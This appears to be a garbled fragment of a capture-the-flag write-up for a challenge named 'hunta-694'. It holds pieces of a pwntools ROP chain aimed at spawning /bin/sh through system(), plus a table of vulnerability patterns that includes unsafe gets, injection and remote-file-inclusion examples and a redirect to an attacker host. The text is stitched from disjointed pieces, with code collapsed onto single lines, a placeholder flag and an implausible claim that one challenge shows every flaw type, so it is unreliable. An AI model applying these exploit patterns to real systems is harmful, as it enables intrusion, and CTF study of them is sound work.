Hunta-694

CTF<something_related_to_the_challenge> Capture it with:

# ---- Step 3: Build final ROP chain -------------------------------- pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0] bin_sh = next(libc.search(b'/bin/sh')) system = libc.symbols['system'] hunta-694

# ---------------------------------------------------------------------- # Exploit # ---------------------------------------------------------------------- def main(): io = start() unchecked read / recv | e.g.

| Category | Typical Indicator | How it manifested in hunta‑694 | |----------|-------------------|-------------------------------| | | gets , strcpy , unchecked read / recv | e.g., gets(buf) in vuln() | | Format string | printf(user_input) | e.g., printf(user_input); | | Use‑after‑free / Double free | free(ptr); … free(ptr); | Observed in heap manipulation | | Integer overflow | malloc(size * elem) without checks | Triggered by large input | | Command injection | system(user_input) | Allows arbitrary shell | | SQL / NoSQL injection | Direct string concatenation in query | SELECT * FROM users WHERE name=' + input | | Crypto weakness | Small RSA modulus, fixed IV, ECB mode | RSA modulus 256‑bit | | Logic flaw | Bypass authentication via magic value | Accepts "admin" after certain condition | | File inclusion | include($_GET['page']) | Remote file inclusion (RFI) | | Web‑specific | Missing CSRF tokens, open redirects | Redirect to http://attacker/... | hunta-694